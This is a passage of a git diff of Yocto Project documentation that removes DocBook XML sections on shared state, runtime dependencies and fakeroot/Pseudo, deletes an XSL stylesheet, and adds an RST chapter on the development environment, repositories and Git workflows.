-                            <filename>sstate-outputdirs</filename> would be the
-                            same, you can use
-                            <filename>sstate-plaindirs</filename>.
-                            For example, to preserve the
-                            <filename>${PKGD}</filename> and
-                            <filename>${PKGDEST}</filename> output from the
-                            <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-package'><filename>do_package</filename></ulink>
-                            task, use the following:
-                            <literallayout class='monospaced'>
-     do_package[sstate-plaindirs] = "${PKGD} ${PKGDEST}"
-                            </literallayout>
-                        </note>
-                        </para></listitem>
-                    <listitem><para>
-                        The <filename>do_deploy[stamp-extra-info] = "${MACHINE_ARCH}"</filename>
-                        line appends extra metadata to the
-                        <link linkend='stamp-files-and-the-rerunning-of-tasks'>stamp file</link>.
-                        In this case, the metadata makes the task specific
-                        to a machine's architecture.
-                        See
-                        "<ulink url='&YOCTO_DOCS_BB_URL;#ref-bitbake-tasklist'>The Task List</ulink>"
-                        section in the BitBake User Manual for more
-                        information on the <filename>stamp-extra-info</filename>
-                        flag.
-                        </para></listitem>
-                    <listitem><para>
-                        <filename>sstate-inputdirs</filename> and
-                        <filename>sstate-outputdirs</filename> can also be used
-                        with multiple directories.
-                        For example, the following declares
-                        <filename>PKGDESTWORK</filename> and
-                        <filename>SHLIBWORK</filename> as shared state
-                        input directories, which populates the shared state
-                        cache, and <filename>PKGDATA_DIR</filename> and
-                        <filename>SHLIBSDIR</filename> as the corresponding
-                        shared state output directories:
-                        <literallayout class='monospaced'>
-     do_package[sstate-inputdirs] = "${PKGDESTWORK} ${SHLIBSWORKDIR}"
-     do_package[sstate-outputdirs] = "${PKGDATA_DIR} ${SHLIBSDIR}"
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        These methods also include the ability to take a
-                        lockfile when manipulating shared state directory
-                        structures, for cases where file additions or removals
-                        are sensitive:
-                        <literallayout class='monospaced'>
-     do_package[sstate-lockfile] = "${PACKAGELOCK}"
-                        </literallayout>
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-
-            <para>
-                Behind the scenes, the shared state code works by looking in
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-SSTATE_DIR'><filename>SSTATE_DIR</filename></ulink>
-                and
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-SSTATE_MIRRORS'><filename>SSTATE_MIRRORS</filename></ulink>
-                for shared state files.
-                Here is an example:
-                <literallayout class='monospaced'>
-     SSTATE_MIRRORS ?= "\
-     file://.* http://someserver.tld/share/sstate/PATH;downloadfilename=PATH \n \
-     file://.* file:///some/local/dir/sstate/PATH"
-                </literallayout>
-                <note>
-                    The shared state directory
-                    (<filename>SSTATE_DIR</filename>) is organized into
-                    two-character subdirectories, where the subdirectory
-                    names are based on the first two characters of the hash.
-                    If the shared state directory structure for a mirror has the
-                    same structure as <filename>SSTATE_DIR</filename>, you must
-                    specify "PATH" as part of the URI to enable the build system
-                    to map to the appropriate subdirectory.
-                </note>
-            </para>
-
-            <para>
-                The shared state package validity can be detected just by
-                looking at the filename since the filename contains the task
-                checksum (or signature) as described earlier in this section.
-                If a valid shared state package is found, the build process
-                downloads it and uses it to accelerate the task.
-            </para>
-
-            <para>
-                The build processes use the <filename>*_setscene</filename>
-                tasks for the task acceleration phase.
-                BitBake goes through this phase before the main execution
-                code and tries to accelerate any tasks for which it can find
-                shared state packages.
-                If a shared state package for a task is available, the
-                shared state package is used.
-                This means the task and any tasks on which it is dependent
-                are not executed.
-            </para>
-
-            <para>
-                As a real world example, the aim is when building an IPK-based
-                image, only the
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-package_write_ipk'><filename>do_package_write_ipk</filename></ulink>
-                tasks would have their shared state packages fetched and
-                extracted.
-                Since the sysroot is not used, it would never get extracted.
-                This is another reason why a task-based approach is preferred
-                over a recipe-based approach, which would have to install the
-                output from every task.
-            </para>
-        </section>
-    </section>
-
-    <section id='automatically-added-runtime-dependencies'>
-        <title>Automatically Added Runtime Dependencies</title>
-
-        <para>
-            The OpenEmbedded build system automatically adds common types of
-            runtime dependencies between packages, which means that you do not
-            need to explicitly declare the packages using
-            <ulink url='&YOCTO_DOCS_REF_URL;#var-RDEPENDS'><filename>RDEPENDS</filename></ulink>.
-            Three automatic mechanisms exist (<filename>shlibdeps</filename>,
-            <filename>pcdeps</filename>, and <filename>depchains</filename>)
-            that handle shared libraries, package configuration (pkg-config)
-            modules, and <filename>-dev</filename> and
-            <filename>-dbg</filename> packages, respectively.
-            For other types of runtime dependencies, you must manually declare
-            the dependencies.
-            <itemizedlist>
-                <listitem><para>
-                    <filename>shlibdeps</filename>:
-                    During the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-package'><filename>do_package</filename></ulink>
-                    task of each recipe, all shared libraries installed by the
-                    recipe are located.
-                    For each shared library, the package that contains the
-                    shared library is registered as providing the shared
-                    library.
-                    More specifically, the package is registered as providing
-                    the
-                    <ulink url='https://en.wikipedia.org/wiki/Soname'>soname</ulink>
-                    of the library.
-                    The resulting shared-library-to-package mapping
-                    is saved globally in
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-PKGDATA_DIR'><filename>PKGDATA_DIR</filename></ulink>
-                    by the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-packagedata'><filename>do_packagedata</filename></ulink>
-                    task.</para>
-
-                    <para>Simultaneously, all executables and shared libraries
-                    installed by the recipe are inspected to see what shared
-                    libraries they link against.
-                    For each shared library dependency that is found,
-                    <filename>PKGDATA_DIR</filename> is queried to
-                    see if some package (likely from a different recipe)
-                    contains the shared library.
-                    If such a package is found, a runtime dependency is added
-                    from the package that depends on the shared library to the
-                    package that contains the library.</para>
-
-                    <para>The automatically added runtime dependency also
-                    includes a version restriction.
-                    This version restriction specifies that at least the
-                    current version of the package that provides the shared
-                    library must be used, as if
-                    "<replaceable>package</replaceable> (>= <replaceable>version</replaceable>)"
-                    had been added to <filename>RDEPENDS</filename>.
-                    This forces an upgrade of the package containing the shared
-                    library when installing the package that depends on the
-                    library, if needed.</para>
-
-                    <para>If you want to avoid a package being registered as
-                    providing a particular shared library (e.g. because the library
-                    is for internal use only), then add the library to
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-PRIVATE_LIBS'><filename>PRIVATE_LIBS</filename></ulink>
-                    inside the package's recipe.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>pcdeps</filename>:
-                    During the <filename>do_package</filename> task of each
-                    recipe, all pkg-config modules
-                    (<filename>*.pc</filename> files) installed by the recipe
-                    are located.
-                    For each module, the package that contains the module is
-                    registered as providing the module.
-                    The resulting module-to-package mapping is saved globally in
-                    <filename>PKGDATA_DIR</filename> by the
-                    <filename>do_packagedata</filename> task.</para>
-
-                    <para>Simultaneously, all pkg-config modules installed by
-                    the recipe are inspected to see what other pkg-config
-                    modules they depend on.
-                    A module is seen as depending on another module if it
-                    contains a "Requires:" line that specifies the other module.
-                    For each module dependency,
-                    <filename>PKGDATA_DIR</filename> is queried to see if some
-                    package contains the module.
-                    If such a package is found, a runtime dependency is added
-                    from the package that depends on the module to the package
-                    that contains the module.
-                    <note>
-                        The <filename>pcdeps</filename> mechanism most often
-                        infers dependencies between <filename>-dev</filename>
-                        packages.
-                    </note>
-                    </para></listitem>
-                <listitem><para>
-                    <filename>depchains</filename>:
-                    If a package <filename>foo</filename> depends on a package
-                    <filename>bar</filename>, then <filename>foo-dev</filename>
-                    and <filename>foo-dbg</filename> are also made to depend on
-                    <filename>bar-dev</filename> and
-                    <filename>bar-dbg</filename>, respectively.
-                    Taking the <filename>-dev</filename> packages as an
-                    example, the <filename>bar-dev</filename> package might
-                    provide headers and shared library symlinks needed by
-                    <filename>foo-dev</filename>, which shows the need
-                    for a dependency between the packages.</para>
-
-                    <para>The dependencies added by
-                    <filename>depchains</filename> are in the form of
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-RRECOMMENDS'><filename>RRECOMMENDS</filename></ulink>.
-                    <note>
-                        By default, <filename>foo-dev</filename> also has an
-                        <filename>RDEPENDS</filename>-style dependency on
-                        <filename>foo</filename>, because the default value of
-                        <filename>RDEPENDS_${PN}-dev</filename> (set in
-                        <filename>bitbake.conf</filename>) includes
-                        "${PN}".
-                    </note></para>
-
-                    <para>To ensure that the dependency chain is never broken,
-                    <filename>-dev</filename> and <filename>-dbg</filename>
-                    packages are always generated by default, even if the
-                    packages turn out to be empty.
-                    See the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-ALLOW_EMPTY'><filename>ALLOW_EMPTY</filename></ulink>
-                    variable for more information.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-
-        <para>
-            The <filename>do_package</filename> task depends on the
-            <filename>do_packagedata</filename> task of each recipe in
-            <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPENDS'><filename>DEPENDS</filename></ulink>
-            through use of a
-            <filename>[</filename><ulink url='&YOCTO_DOCS_BB_URL;#variable-flags'><filename>deptask</filename></ulink><filename>]</filename>
-            declaration, which guarantees that the required
-            shared-library/module-to-package mapping information will be available
-            when needed as long as <filename>DEPENDS</filename> has been
-            correctly set.
-        </para>
-    </section>
-
-    <section id='fakeroot-and-pseudo'>
-        <title>Fakeroot and Pseudo</title>
-
-        <para>
-            Some tasks are easier to implement when allowed to perform certain
-            operations that are normally reserved for the root user (e.g.
-            <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-install'><filename>do_install</filename></ulink>,
-            <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-package_write_deb'><filename>do_package_write*</filename></ulink>,
-            <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-rootfs'><filename>do_rootfs</filename></ulink>,
-            and
-            <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-image'><filename>do_image*</filename></ulink>).
-            For example, the <filename>do_install</filename> task benefits
-            from being able to set the UID and GID of installed files to
-            arbitrary values.
-        </para>
-
-        <para>
-            One approach to allowing tasks to perform root-only operations
-            would be to require
-            <ulink url='&YOCTO_DOCS_REF_URL;#bitbake-term'>BitBake</ulink>
-            to run as root.
-            However, this method is cumbersome and has security issues.
-            The approach that is actually used is to run tasks that benefit
-            from root privileges in a "fake" root environment.
-            Within this environment, the task and its child processes believe
-            that they are running as the root user, and see an internally
-            consistent view of the filesystem.
-            As long as generating the final output (e.g. a package or an image)
-            does not require root privileges, the fact that some earlier
-            steps ran in a fake root environment does not cause problems.
-        </para>
-
-        <para>
-            The capability to run tasks in a fake root environment is known as
-            "<ulink url='http://man.he.net/man1/fakeroot'>fakeroot</ulink>",
-            which is derived from the BitBake keyword/variable
-            flag that requests a fake root environment for a task.
-        </para>
-
-        <para>
-            In the
-            <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>OpenEmbedded build system</ulink>,
-            the program that implements fakeroot is known as
-            <ulink url='https://www.yoctoproject.org/software-item/pseudo/'>Pseudo</ulink>.
-            Pseudo overrides system calls by using the environment variable
-            <filename>LD_PRELOAD</filename>, which results in the illusion
-            of running as root.
-            To keep track of "fake" file ownership and permissions resulting
-            from operations that require root permissions, Pseudo uses
-            an SQLite 3 database.
-            This database is stored in
-            <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-WORKDIR'><filename>WORKDIR</filename></ulink><filename>}/pseudo/files.db</filename>
-            for individual recipes.
-            Storing the database in a file as opposed to in memory
-            gives persistence between tasks and builds, which is not
-            accomplished using fakeroot.
-            <note><title>Caution</title>
-                If you add your own task that manipulates the same files or
-                directories as a fakeroot task, then that task also needs to
-                run under fakeroot.
-                Otherwise, the task cannot run root-only operations, and
-                cannot see the fake file ownership and permissions set by the
-                other task.
-                You need to also add a dependency on
-                <filename>virtual/fakeroot-native:do_populate_sysroot</filename>,
-                giving the following:
-                <literallayout class='monospaced'>
-       fakeroot do_mytask () {
-           ...
-       }
-       do_mytask[depends] += "virtual/fakeroot-native:do_populate_sysroot"
-                </literallayout>
-            </note>
-            For more information, see the
-            <ulink url='&YOCTO_DOCS_BB_URL;#var-FAKEROOT'><filename>FAKEROOT*</filename></ulink>
-            variables in the BitBake User Manual.
-            You can also reference the
-            "<ulink url='https://github.com/wrpseudo/pseudo/wiki/WhyNotFakeroot'>Why Not Fakeroot?</ulink>"
-            article for background information on Fakeroot and Pseudo.
-        </para>
-    </section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/overview-manual/overview-manual-customization.xsl b/documentation/overview-manual/overview-manual-customization.xsl
deleted file mode 100644
index 22360e7bab..0000000000
--- a/documentation/overview-manual/overview-manual-customization.xsl
+++ /dev/null
@@ -1,27 +0,0 @@
-<?xml version='1.0'?>
-<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns="http://www.w3.org/1999/xhtml" xmlns:fo="http://www.w3.org/1999/XSL/Format" version="1.0">
-
-  <xsl:import href="http://downloads.yoctoproject.org/mirror/docbook-mirror/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
-<!--
-
-  <xsl:import href="../template/1.76.1/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
-  <xsl:import href="http://docbook.sourceforge.net/release/xsl/1.76.1/xhtml/docbook.xsl" />
-
--->
-
-  <xsl:include href="../template/permalinks.xsl"/>
-  <xsl:include href="../template/section.title.xsl"/>
-  <xsl:include href="../template/component.title.xsl"/>
-  <xsl:include href="../template/division.title.xsl"/>
-  <xsl:include href="../template/formal.object.heading.xsl"/>
-
-  <xsl:param name="html.stylesheet" select="'overview-manual-style.css'" />
-  <xsl:param name="chapter.autolabel" select="1" />
-  <xsl:param name="appendix.autolabel" select="A" />
-  <xsl:param name="section.autolabel" select="1" />
-  <xsl:param name="section.label.includes.component.label" select="1" />
-  <xsl:param name="generate.id.attributes" select="1" />
-
-</xsl:stylesheet>
diff --git a/documentation/overview-manual/overview-manual-development-environment.rst b/documentation/overview-manual/overview-manual-development-environment.rst
new file mode 100644
index 0000000000..a5469d4d78
--- /dev/null
+++ b/documentation/overview-manual/overview-manual-development-environment.rst
@@ -0,0 +1,672 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+*****************************************
+The Yocto Project Development Environment
+*****************************************
+
+This chapter takes a look at the Yocto Project development environment.
+The chapter provides Yocto Project Development environment concepts that
+help you understand how work is accomplished in an open source
+environment, which is very different as compared to work accomplished in
+a closed, proprietary environment.
+
+Specifically, this chapter addresses open source philosophy, source
+repositories, workflows, Git, and licensing.
+
+Open Source Philosophy
+======================
+
+Open source philosophy is characterized by software development directed
+by peer production and collaboration through an active community of
+developers. Contrast this to the more standard centralized development
+models used by commercial software companies where a finite set of
+developers produces a product for sale using a defined set of procedures
+that ultimately result in an end product whose architecture and source
+material are closed to the public.
+
+Open source projects conceptually have differing concurrent agendas,
+approaches, and production. These facets of the development process can
+come from anyone in the public (community) who has a stake in the
+software project. The open source environment contains new copyright,
+licensing, domain, and consumer issues that differ from the more
+traditional development environment. In an open source environment, the
+end product, source material, and documentation are all available to the
+public at no cost.
+
+A benchmark example of an open source project is the Linux kernel, which
+was initially conceived and created by Finnish computer science student
+Linus Torvalds in 1991. Conversely, a good example of a non-open source
+project is the Windows family of operating systems developed by
+Microsoft Corporation.
+
+Wikipedia has a good historical description of the Open Source
+Philosophy `here <http://en.wikipedia.org/wiki/Open_source>`__. You can
+also find helpful information on how to participate in the Linux
+Community
+`here <https://www.kernel.org/doc/html/latest/process/index.html>`__.
+
+.. _gs-the-development-host:
+
+The Development Host
+====================
+
+A development host or :term:`Build Host` is key to
+using the Yocto Project. Because the goal of the Yocto Project is to
+develop images or applications that run on embedded hardware,
+development of those images and applications generally takes place on a
+system not intended to run the software - the development host.
+
+You need to set up a development host in order to use it with the Yocto
+Project. Most find that it is best to have a native Linux machine
+function as the development host. However, it is possible to use a
+system that does not run Linux as its operating system as your
+development host. When you have a Mac or Windows-based system, you can
+set it up as the development host by using
+`CROPS <https://github.com/crops/poky-container>`__, which leverages
+`Docker Containers <https://www.docker.com/>`__. Once you take the steps
+to set up a CROPS machine, you effectively have access to a shell
+environment that is similar to what you see when using a Linux-based
+development host. For the steps needed to set up a system using CROPS,
+see the
+":ref:`dev-manual/dev-manual-start:setting up to use cross platforms (crops)`"
+section in
+the Yocto Project Development Tasks Manual.
+
+If your development host is going to be a system that runs a Linux
+distribution, steps still exist that you must take to prepare the system
+for use with the Yocto Project. You need to be sure that the Linux
+distribution on the system is one that supports the Yocto Project. You
+also need to be sure that the correct set of host packages are installed
+that allow development using the Yocto Project. For the steps needed to
+set up a development host that runs Linux, see the
+":ref:`dev-manual/dev-manual-start:setting up a native linux host`"
+section in the Yocto Project Development Tasks Manual.
+
+Once your development host is set up to use the Yocto Project, several
+methods exist for you to do work in the Yocto Project environment:
+
+-  *Command Lines, BitBake, and Shells:* Traditional development in the
+   Yocto Project involves using the :term:`OpenEmbedded Build System`,
+   which uses
+   BitBake, in a command-line environment from a shell on your
+   development host. You can accomplish this from a host that is a
+   native Linux machine or from a host that has been set up with CROPS.
+   Either way, you create, modify, and build images and applications all
+   within a shell-based environment using components and tools available
+   through your Linux distribution and the Yocto Project.
+
+   For a general flow of the build procedures, see the
+   ":ref:`dev-manual/dev-manual-common-tasks:building a simple image`"
+   section in the Yocto Project Development Tasks Manual.
+
+-  *Board Support Package (BSP) Development:* Development of BSPs
+   involves using the Yocto Project to create and test layers that allow
+   easy development of images and applications targeted for specific
+   hardware. To development BSPs, you need to take some additional steps
+   beyond what was described in setting up a development host.
+
+   The :doc:`../bsp-guide/bsp-guide` provides BSP-related development
+   information. For specifics on development host preparation, see the
+   ":ref:`bsp-guide/bsp:preparing your build host to work with bsp layers`"
+   section in the Yocto Project Board Support Package (BSP) Developer's
+   Guide.
+
+-  *Kernel Development:* If you are going to be developing kernels using
+   the Yocto Project you likely will be using ``devtool``. A workflow
+   using ``devtool`` makes kernel development quicker by reducing
+   iteration cycle times.
+
+   The :doc:`../kernel-dev/kernel-dev` provides kernel-related
+   development information. For specifics on development host
+   preparation, see the
+   ":ref:`kernel-dev/kernel-dev-common:preparing the build host to work on the kernel`"
+   section in the Yocto Project Linux Kernel Development Manual.
+
+-  *Using Toaster:* The other Yocto Project development method that
+   involves an interface that effectively puts the Yocto Project into
+   the background is Toaster. Toaster provides an interface to the
+   OpenEmbedded build system. The interface enables you to configure and
+   run your builds. Information about builds is collected and stored in
+   a database. You can use Toaster to configure and start builds on
+   multiple remote build servers.
+
+   For steps that show you how to set up your development host to use
+   Toaster and on how to use Toaster in general, see the
+   :doc:`../toaster-manual/toaster-manual`.
+
+.. _yocto-project-repositories:
+
+Yocto Project Source Repositories
+=================================
+
+The Yocto Project team maintains complete source repositories for all
+Yocto Project files at :yocto_git:`/`. This web-based source
+code browser is organized into categories by function such as IDE
+Plugins, Matchbox, Poky, Yocto Linux Kernel, and so forth. From the
+interface, you can click on any particular item in the "Name" column and
+see the URL at the bottom of the page that you need to clone a Git
+repository for that particular item. Having a local Git repository of
+the :term:`Source Directory`, which
+is usually named "poky", allows you to make changes, contribute to the
+history, and ultimately enhance the Yocto Project's tools, Board Support
+Packages, and so forth.
+
+For any supported release of Yocto Project, you can also go to the
+:yocto_home:`Yocto Project Website <>` and select the "DOWNLOADS"
+item from the "SOFTWARE" menu and get a released tarball of the ``poky``
+repository, any supported BSP tarball, or Yocto Project tools. Unpacking
+these tarballs gives you a snapshot of the released files.
+
+.. note::
+
+   -  The recommended method for setting up the Yocto Project
+      :term:`Source Directory` and the files
+      for supported BSPs (e.g., ``meta-intel``) is to use `Git <#git>`__
+      to create a local copy of the upstream repositories.
+
+   -  Be sure to always work in matching branches for both the selected
+      BSP repository and the Source Directory (i.e. ``poky``)
+      repository. For example, if you have checked out the "master"
+      branch of ``poky`` and you are going to use ``meta-intel``, be
+      sure to checkout the "master" branch of ``meta-intel``.
+
+In summary, here is where you can get the project files needed for
+development:
+
+-  :yocto_git:`Source Repositories: <>` This area contains IDE
+   Plugins, Matchbox, Poky, Poky Support, Tools, Yocto Linux Kernel, and
+   Yocto Metadata Layers. You can create local copies of Git
+   repositories for each of these areas.
+
+   .. image:: figures/source-repos.png
+      :align: center
+
+   For steps on how to view and access these upstream Git repositories,
+   see the ":ref:`dev-manual/dev-manual-start:accessing source repositories`"
+   Section in the Yocto Project Development Tasks Manual.
+
+-  :yocto_dl:`Index of /releases: </releases>` This is an index
+   of releases such as Poky, Pseudo, installers for cross-development
+   toolchains, miscellaneous support and all released versions of Yocto
+   Project in the form of images or tarballs. Downloading and extracting
+   these files does not produce a local copy of the Git repository but
+   rather a snapshot of a particular release or image.
+
+   .. image:: figures/index-downloads.png
+      :align: center
+
+   For steps on how to view and access these files, see the
+   ":ref:`dev-manual/dev-manual-start:accessing index of releases`"
+   section in the Yocto Project Development Tasks Manual.
+
+-  *"DOWNLOADS" page for the* :yocto_home:`Yocto Project Website <>` *:*
+
+   The Yocto Project website includes a "DOWNLOADS" page accessible
+   through the "SOFTWARE" menu that allows you to download any Yocto
+   Project release, tool, and Board Support Package (BSP) in tarball
+   form. The tarballs are similar to those found in the
+   :yocto_dl:`Index of /releases: </releases>` area.
+
+   .. image:: figures/yp-download.png
+      :align: center
+
+   For steps on how to use the "DOWNLOADS" page, see the
+   ":ref:`dev-manual/dev-manual-start:using the downloads page`"
+   section in the Yocto Project Development Tasks Manual.
+
+.. _gs-git-workflows-and-the-yocto-project:
+
+Git Workflows and the Yocto Project
+===================================
+
+Developing using the Yocto Project likely requires the use of
+`Git <#git>`__. Git is a free, open source distributed version control
+system used as part of many collaborative design environments. This
+section provides workflow concepts using the Yocto Project and Git. In
+particular, the information covers basic practices that describe roles
+and actions in a collaborative development environment.
+
+.. note::
+
+   If you are familiar with this type of development environment, you
+   might not want to read this section.
+
+The Yocto Project files are maintained using Git in "branches" whose Git
+histories track every change and whose structures provide branches for
+all diverging functionality. Although there is no need to use Git, many
+open source projects do so.
+
+For the Yocto Project, a key individual called the "maintainer" is
+responsible for the integrity of the "master" branch of a given Git
+repository. The "master" branch is the "upstream" repository from which
+final or most recent builds of a project occur. The maintainer is
+responsible for accepting changes from other developers and for
+organizing the underlying branch structure to reflect release strategies
+and so forth.
+
+.. note::
+
+   For information on finding out who is responsible for (maintains) a
+   particular area of code in the Yocto Project, see the
+   ":ref:`dev-manual/dev-manual-common-tasks:submitting a change to the yocto project`"
+   section of the Yocto Project Development Tasks Manual.
+
+The Yocto Project ``poky`` Git repository also has an upstream
+contribution Git repository named ``poky-contrib``. You can see all the
+branches in this repository using the web interface of the
+:yocto_git:`Source Repositories <>` organized within the "Poky Support"
+area. These branches hold changes (commits) to the project that have
+been submitted or committed by the Yocto Project development team and by
+community members who contribute to the project. The maintainer
+determines if the changes are qualified to be moved from the "contrib"
+branches into the "master" branch of the Git repository.
+
+Developers (including contributing community members) create and
+maintain cloned repositories of upstream branches. The cloned
+repositories are local to their development platforms and are used to
+develop changes. When a developer is satisfied with a particular feature
+or change, they "push" the change to the appropriate "contrib"
+repository.
+
+Developers are responsible for keeping their local repository up-to-date
+with whatever upstream branch they are working against. They are also
+responsible for straightening out any conflicts that might arise within
+files that are being worked on simultaneously by more than one person.
+All this work is done locally on the development host before anything is
+pushed to a "contrib" area and examined at the maintainer's level.
+
+A somewhat formal method exists by which developers commit changes and
+push them into the "contrib" area and subsequently request that the
+maintainer include them into an upstream branch. This process is called
+"submitting a patch" or "submitting a change." For information on
+submitting patches and changes, see the
+":ref:`dev-manual/dev-manual-common-tasks:submitting a change to the yocto project`"
+section in the Yocto Project Development Tasks Manual.
+
+In summary, a single point of entry exists for changes into a "master"
+or development branch of the Git repository, which is controlled by the
+project's maintainer. And, a set of developers exist who independently
+develop, test, and submit changes to "contrib" areas for the maintainer
+to examine. The maintainer then chooses which changes are going to
+become a permanent part of the project.
+
+.. image:: figures/git-workflow.png
+   :align: center
+
+While each development environment is unique, there are some best
+practices or methods that help development run smoothly. The following
+list describes some of these practices. For more information about Git
+workflows, see the workflow topics in the `Git Community
+Book <http://book.git-scm.com>`__.
+
+-  *Make Small Changes:* It is best to keep the changes you commit small
+   as compared to bundling many disparate changes into a single commit.
+   This practice not only keeps things manageable but also allows the
+   maintainer to more easily include or refuse changes.
+
+-  *Make Complete Changes:* It is also good practice to leave the
+   repository in a state that allows you to still successfully build
+   your project. In other words, do not commit half of a feature, then
+   add the other half as a separate, later commit. Each commit should
+   take you from one buildable project state to another buildable state.
+
+-  *Use Branches Liberally:* It is very easy to create, use, and delete
+   local branches in your working Git repository on the development
+   host. You can name these branches anything you like. It is helpful to
+   give them names associated with the particular feature or change on
+   which you are working. Once you are done with a feature or change and
+   have merged it into your local master branch, simply discard the
+   temporary branch.
+
+-  *Merge Changes:* The ``git merge`` command allows you to take the
+   changes from one branch and fold them into another branch. This
+   process is especially helpful when more than a single developer might
+   be working on different parts of the same feature. Merging changes
+   also automatically identifies any collisions or "conflicts" that
+   might happen as a result of the same lines of code being altered by
+   two different developers.
+
+-  *Manage Branches:* Because branches are easy to use, you should use a
+   system where branches indicate varying levels of code readiness. For
+   example, you can have a "work" branch to develop in, a "test" branch
+   where the code or change is tested, a "stage" branch where changes
+   are ready to be committed, and so forth. As your project develops,
+   you can merge code across the branches to reflect ever-increasing
+   stable states of the development.
+
+-  *Use Push and Pull:* The push-pull workflow is based on the concept
+   of developers "pushing" local commits to a remote repository, which
+   is usually a contribution repository. This workflow is also based on
+   developers "pulling" known states of the project down into their
+   local development repositories. The workflow easily allows you to
+   pull changes submitted by other developers from the upstream
+   repository into your work area ensuring that you have the most recent
+   software on which to develop. The Yocto Project has two scripts named
+   ``create-pull-request`` and ``send-pull-request`` that ship with the
+   release to facilitate this workflow. You can find these scripts in
+   the ``scripts`` folder of the
+   :term:`Source Directory`. For information
+   on how to use these scripts, see the
+   ":ref:`dev-manual/dev-manual-common-tasks:using scripts to push a change upstream and request a pull`"
+   section in the Yocto Project Development Tasks Manual.
+
+-  *Patch Workflow:* This workflow allows you to notify the maintainer
+   through an email that you have a change (or patch) you would like
+   considered for the "master" branch of the Git repository. To send
+   this type of change, you format the patch and then send the email
+   using the Git commands ``git format-patch`` and ``git send-email``.
+   For information on how to use these scripts, see the
+   ":ref:`dev-manual/dev-manual-common-tasks:submitting a change to the yocto project`"
+   section in the Yocto Project Development Tasks Manual.
+
+Git
+===
+
+The Yocto Project makes extensive use of Git, which is a free, open
+source distributed version control system. Git supports distributed
+development, non-linear development, and can handle large projects. It
+is best that you have some fundamental understanding of how Git tracks
+projects and how to work with Git if you are going to use the Yocto
+Project for development. This section provides a quick overview of how
+Git works and provides you with a summary of some essential Git
+commands.
+
+.. note::
+
+   -  For more information on Git, see
+      http://git-scm.com/documentation.
+
+   -  If you need to download Git, it is recommended that you add Git to
+      your system through your distribution's "software store" (e.g. for
+      Ubuntu, use the Ubuntu Software feature). For the Git download
+      page, see http://git-scm.com/download.
+
+   -  For information beyond the introductory nature in this section,
+      see the ":ref:`dev-manual/dev-manual-start:locating yocto project source files`"
+      section in the Yocto Project Development Tasks Manual.
+
+Repositories, Tags, and Branches
+--------------------------------
+
+As mentioned briefly in the previous section and also in the "`Git
+Workflows and the Yocto
+Project <#gs-git-workflows-and-the-yocto-project>`__" section, the Yocto
+Project maintains source repositories at :yocto_git:`/`. If you
+look at this web-interface of the repositories, each item is a separate
+Git repository.
+
+Git repositories use branching techniques that track content change (not
+files) within a project (e.g. a new feature or updated documentation).
+Creating a tree-like structure based on project divergence allows for
+excellent historical information over the life of a project. This
+methodology also allows for an environment from which you can do lots of
+local experimentation on projects as you develop changes or new
+features.
+
+A Git repository represents all development efforts for a given project.
+For example, the Git repository ``poky`` contains all changes and
+developments for that repository over the course of its entire life.
+That means that all changes that make up all releases are captured. The
+repository maintains a complete history of changes.
+
+You can create a local copy of any repository by "cloning" it with the
+``git clone`` command. When you clone a Git repository, you end up with
+an identical copy of the repository on your development system. Once you
+have a local copy of a repository, you can take steps to develop
+locally. For examples on how to clone Git repositories, see the
+":ref:`dev-manual/dev-manual-start:locating yocto project source files`"
+section in the Yocto Project Development Tasks Manual.
+
+It is important to understand that Git tracks content change and not
+files. Git uses "branches" to organize different development efforts.
+For example, the ``poky`` repository has several branches that include
+the current "&DISTRO_NAME_NO_CAP;" branch, the "master" branch, and many
+branches for past Yocto Project releases. You can see all the branches
+by going to :yocto_git:`/cgit.cgi/poky/` and clicking on the
+``[...]`` link beneath the "Branch" heading.
+
+Each of these branches represents a specific area of development. The
+"master" branch represents the current or most recent development. All
+other branches represent offshoots of the "master" branch.
+
+When you create a local copy of a Git repository, the copy has the same
+set of branches as the original. This means you can use Git to create a
+local working area (also called a branch) that tracks a specific
+development branch from the upstream source Git repository. in other
+words, you can define your local Git environment to work on any
+development branch in the repository. To help illustrate, consider the
+following example Git commands:
+::
+
+   $ cd ~
+   $ git clone git://git.yoctoproject.org/poky
+   $ cd poky
+   $ git checkout -b &DISTRO_NAME_NO_CAP; origin/&DISTRO_NAME_NO_CAP;
+
+In the previous example
+after moving to the home directory, the ``git clone`` command creates a
+local copy of the upstream ``poky`` Git repository. By default, Git
+checks out the "master" branch for your work. After changing the working
+directory to the new local repository (i.e. ``poky``), the
+``git checkout`` command creates and checks out a local branch named
+"&DISTRO_NAME_NO_CAP;", which tracks the upstream
+"origin/&DISTRO_NAME_NO_CAP;" branch. Changes you make while in this
+branch would ultimately affect the upstream "&DISTRO_NAME_NO_CAP;" branch
+of the ``poky`` repository.
+
+It is important to understand that when you create and checkout a local
+working branch based on a branch name, your local environment matches
+the "tip" of that particular development branch at the time you created
+your local branch, which could be different from the files in the
+"master" branch of the upstream repository. In other words, creating and
+checking out a local branch based on the "&DISTRO_NAME_NO_CAP;" branch
+name is not the same as checking out the "master" branch in the
+repository. Keep reading to see how you create a local snapshot of a
